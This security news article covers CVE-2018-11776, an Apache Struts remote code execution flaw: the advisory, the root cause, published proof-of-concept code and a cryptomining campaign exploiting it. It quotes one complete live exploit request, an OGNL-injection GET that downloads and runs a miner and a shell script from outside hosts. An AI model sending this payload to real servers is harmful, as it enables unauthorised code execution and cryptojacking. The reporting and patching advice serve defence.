CVE-2018-11776 RCE in Apache Struts

At the end of August, maintainers of Apache Struts released security updates for the Apache Struts 2 open-source development framework to address a critical remote code execution vulnerability (RCE).

The flaw, tracked as CVE-2018-11776, affects Struts versions from 2.3 through 2.3.34, Struts 2.5 through 2.5.16 and possibly unsupported versions of the framework. Struts versions 2.3.35 and 2.5.17 include the security updates to address this problem.

The Struts development team also published a temporary workaround, but they are recommending users to don’t use it and install as soon as possible the updates.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set,” reads the security advisory published by Apache.

“Possible Remote Code Execution when using results with no namespace and in same time, its upper action(s) have no or wildcard namespace. Same possibility when using url tag which doesn’t have value and action set.”

The flaw is easy to exploit. According to the security advisory, it is possible to trigger the RCE vulnerability when the namespace value isn’t set for a result defined in underlying XML configurations and, at the same time, its upper action configurations have no or wildcard namespace. The flaw could be also exploited when using a URL tag which doesn’t have value and action set and at the same time, its upper action(s) configurations have no or wildcard namespace.

The flaw was discovered on April 10 by the security expert Man Yue Mo from the Semmle Security Research team. While security updates were released on June 25 and on 22 August 2018, the new versions of Struts were released.

“This vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework. Due to the fact that this vulnerability affects the core of Struts, there exist multiple separate attack vectors. At the moment, we are aware of two such vectors,” reads the technical analysis published by Semmle.

“For your application to be vulnerable to the attack vectors described below, both of the following conditions should hold:

  1. The alwaysSelectFullNamespace flag is set to true in the Struts configuration. Note that this is automatically the case if your application uses the popular Struts Convention plugin.
  2. Your application’s Struts configuration file contains an <action …> tag that does not specify the optional namespace attribute, or specifies a wildcard namespace (e.g. “/*”)”

The vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request. The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string. OGNL (Object-Graph Navigation Language) is a powerful domain-specific language that is used to customize Apache Struts’ behavior,” the researcher explained.

CVE-2018-11776 Exploit Code Was Published on GitHub

Experts explained that it is quite easy to exploit the flaw, making it very dangerous due to the numerous installs exposed online. An attacker could trigger the flaw by injecting his own namespace as a parameter in an HTTP request. The lack of proper validation for that parameter is the root of the problem.

Just two days after the Apache Software Foundation released the security advisory about the RCE in Apache Struts 2, a working proof-of-concept (PoC) was published online.

Researchers from the threat intelligence firm Recorded Future observed intense activity related to the Struts vulnerability in several Chinese and Russian underground forums.

”Unfortunately, this makes the vulnerability trivial to exploit — in fact, proof-of-concept code has already been released, including a Python script that allows for easy exploitation. Recorded Future has also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability.” reads the analysis published by Recorded Future.

“Unlike last year’s Apache Struts exploit (CVE-2017-5638), which was at the center of the Equifax breach, this vulnerability appears easier to exploit because it does not require the Apache Struts installation to have any additional plugins running in order to successfully exploit it.”

The number of potentially vulnerable applications is very high due to the popularity of the framework.

“Apache Struts is a very popular Java framework and there are potentially hundreds of millions of vulnerable systems that could be exploited by this flaw. The challenge is in identifying how many systems are vulnerable.” continues Recorded Future.

“Because many of the servers running Apache Struts are backend application servers, they are not always easily identified, even by the system owners.”

Another aspect to consider is that there are many Struts installs that cannot be immediately updated. These systems remain vulnerable to attacks, especially in critical environments.

Experts warn of mass Internet scans for vulnerable systems and fear a spike in hacking activities targeting flawed systems.

Struts Flaw Exploited in Attacks in the Wild

A few hours after the exploit code for the remote code execution vulnerability was made available online, researchers from the threat intelligence firm Volexity revealed that the flaw was already being abused in malicious attacks.

Threat actors are leveraging the flaw in the attempt to install the CNRig cryptocurrency miner.

Volexity has observed at least one threat actor attempting to exploit CVE-2018-11776 en masse in order to install the CNRig cryptocurrency miner,” states the report published by Volexity.

“The initial observed scanning originated from the Russian and French IP addresses 95.161.225.94 and 167.114.171.27.” 

The exploit code used by hackers connects to a GitHub repository to fetch a copy of CNRig Miner (saving it as xrig) and access BitBucket to download a shell script.

Below is an example of an exploit attempt observed by the experts from Volexity in live attacks:

GET /struts3-showcase/$${(#_memberAccess[“allowStaticMethodAccess”]=true,#a=@java.lang.Runtime@getRuntime().exec(‘wget -O xrig hxxps://github.com/cnrig/cnrig/releases/download/v0.1.5-release/cnrig-0.1.5-linux-x86_64;wget hxxps://bitbucket.org/c646/zz/downloads/upcheck.sh || curl -L hxxps://bitbucket.org/c646/zz/downloads/upcheck.sh –output upcheck.sh;chmod x xrig;chmod x upcheck.sh;nohup ./upcheck.sh &;nohup ./xrig -a cryptonight -o us-east.cryptonight-hub.miningpoolhub.com:20580 -u c646.miner -p x &;rm xrig’).getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())}/actionChain1.action HTTP/1.1

The analysis continues, explaining how the exploit will proceed:

“If the above exploit attempt is successful, the vulnerable system will perform wget requests to the two URLs listed below in order to download a copy of CNRig Miner from Github (saved as xrig) and a shell script from BitBucket (upcheck.sh).”

The shell script is used by the attackers to remove previous instances of the miner, remove specific processes and download three ELF cryptomining binaries.

The miners used by the threat actors in this campaign target multiple architectures, including Intel, ARM and MIPS. This circumstance suggests the attackers are targeting the largest audience possible.

“The three ELF binaries downloaded are executables for the Intel, ARM, and MIPS architectures.  This is worth noting, as it shows the miner is capable of running across a wide range of hardware, such as servers, desktops, laptops, IOT devices, wireless routers, and more — nearly any internet connected device running a vulnerable instance of Apache Struts,” states the report from Volexity.

The BitBucket folder involved in the attack contains both the shell script and the ELF binaries. Researchers observed that the mining account name is the same as the BitBucket account name.

Conclusion

Apache Struts vulnerabilities are very dangerous for organizations. One of them was the root cause of the massive Equifax breach that impacted over 140 million people. As pointed out by the experts, this flaw is easier to exploit than the Equifax one.

There are two ways of protecting against the exploitation of this flaw. First, upgrading to the latest version of Apache Struts, 2.3.35 or 2.5.17; second, by ensuring that the namespace is always set within your Apache Struts framework.

Volexity concluded that “… the Apache Struts framework continues to be targeted by attackers due to a steady stream of critical vulnerabilities. It is critical that organizations remain diligent, ensuring this software is updated quickly when new patches are released or otherwise limiting external access to websites leveraging it. Although the main payload for Apache Struts exploits appears to be cryptocurrency miners, failure to patch also leaves an organization open to significant risk that goes beyond cryptomining.”

I personally believe the number of campaigns targeting the CVE-2018-11776 vulnerability will increase, due to the large number of Apache Struts 2 installs still unpatched that are exposed online.

 

Sources

Experts discovered a Critical Remote Code Execution flaw in Apache Struts (CVE-2018-11776), Security Affairs

Experts warn of possible attacks after PoC code for CVE-2018-11776 Struts flaw was published, Security Affairs

Critical Apache Struts flaw CVE-2018-11776 exploited in attacks in the wild, Security Affair

S2-057, Apache Struts 2 Documentation

Semmle Discovers Critical Remote Code Execution Vulnerability in Apache Struts (CVE-2018-11776), Semmle

Apache Struts Vulnerability POC Code Found on GitHub, Recorded Future

pr4jwal/quick-scripts, GitHub

Active Exploitation of New Apache Struts Vulnerability CVE-2018-11776 Deploys Cryptocurrency Miner, Volexity